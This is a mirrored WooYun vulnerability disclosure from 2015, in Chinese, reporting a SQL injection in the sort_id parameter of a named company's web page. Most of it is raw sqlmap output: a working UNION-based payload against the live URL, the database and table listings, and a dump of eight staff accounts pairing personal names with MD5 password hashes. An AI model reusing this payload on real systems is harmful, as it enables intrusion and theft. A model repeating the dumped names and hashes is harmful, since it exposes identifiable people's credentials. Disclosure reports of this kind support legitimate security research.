乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-08: 细节已通知厂商并且等待厂商处理中 2015-06-09: 厂商已经确认,细节仅向厂商公开 2015-06-19: 细节向核心白帽子及相关领域专家公开 2015-06-29: 细节向普通白帽子公开 2015-07-09: 细节向实习白帽子公开 2015-07-24: 细节向公众公开
求高RANK
注入点:
http://fr.linekong.com/xml/common.php?sort_id=*
sort_id参数存在sql注入
sqlmap identified the following injection points with a total of 2179 HTTP(s) requests:---Parameter: #1* (URI) Type: UNION query Title: MySQL UNION query (92) - 4 columns Payload: http://fr.linekong.com:80/xml/common.php?sort_id=' UNION ALL SELECT 92,CONCAT(0x7178707871,0x61676f74467957576955,0x7170707671),92,92# Vector: UNION ALL SELECT 92,[QUERY],92,92#---web application technology: Apacheback-end DBMS: MySQL >= 5.0.0available databases [2]:[*] fr_web[*] information_schemasqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: #1* (URI) Type: UNION query Title: MySQL UNION query (92) - 4 columns Payload: http://fr.linekong.com:80/xml/common.php?sort_id=' UNION ALL SELECT 92,CONCAT(0x7178707871,0x61676f74467957576955,0x7170707671),92,92#---web application technology: Apacheback-end DBMS: MySQL 5Database: fr_web[28 tables]+-------------------------+| fr_activity_newcard_log || fr_address || fr_article || fr_article_inserl || fr_build || fr_channel || fr_columns || fr_comment || fr_download || fr_editors_inserl || fr_flash || fr_grading || fr_group || fr_image || fr_image_inserl || fr_member || fr_passportstat || fr_sort || fr_template || fr_url || fr_url_inserl || fr_vote || fr_vote_inserl || fr_vote_option || fr_wj_article || fr_wj_article_inserl || fr_wj_image || fr_wj_image_inserl |+-------------------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: #1* (URI) Type: UNION query Title: MySQL UNION query (92) - 4 columns Payload: http://fr.linekong.com:80/xml/common.php?sort_id=' UNION ALL SELECT 92,CONCAT(0x7178707871,0x61676f74467957576955,0x7170707671),92,92#---web application technology: Apacheback-end DBMS: MySQL 5Database: fr_webTable: fr_member[26 columns]+----------------+--------------+| Column | Type |+----------------+--------------+| address_id | int(11) || article_id | int(11) || group_id | int(11) || id | int(11) || image_id | int(11) || nickname | varchar(64) || uadd_time | datetime || url_id | int(11) || user_age | date || user_Dreply | int(11) || user_Dtopic | int(11) || user_email | varchar(32) || user_grading | varchar(64) || user_jointime | datetime || user_like | varchar(255) || user_movephone | varchar(32) || user_msn | varchar(128) || user_name | varchar(32) || user_passwd | varchar(32) || user_perfect | int(11) || user_qq | int(11) || user_sex | int(2) || user_state | int(2) || user_Treply | int(11) || user_Ttopic | int(11) || vote_id | int(11) |+----------------+--------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: #1* (URI) Type: UNION query Title: MySQL UNION query (92) - 4 columns Payload: http://fr.linekong.com:80/xml/common.php?sort_id=' UNION ALL SELECT 92,CONCAT(0x7178707871,0x61676f74467957576955,0x7170707671),92,92#---web application technology: Apacheback-end DBMS: MySQL 5Database: fr_webTable: fr_member[8 entries]+-----------+----------------------------------+| user_name | user_passwd |+-----------+----------------------------------+| 董勇 | 862f3760ca3293437b53cac01b0ffe29 || 实习生 | 003be2507cfad94f1efb32fe3fd0d0ec || 王磊 | e10adc3949ba59abbe56e057f20f883e || 刘志刚 | 30fed3a8f7747d5b55707b5ebfe4dc77 || 运维值班工程师 | cbef2ead7978557272b0c692f356b3cd || 李治 | cd9dac6dbb33988a3214e7ba85d272fc || 张静 | b1d8fcdf6d0db7011c71fc30e7aef4a4 || 韩秋莹 | 2f090f77c0d55fdf508e324140050160 |+-----------+----------------------------------+
参数过滤
危害等级:中
漏洞Rank:10
确认时间:2015-06-09 14:45
感谢提出的问题,该项目已下线,我们准备进行下线操作
暂无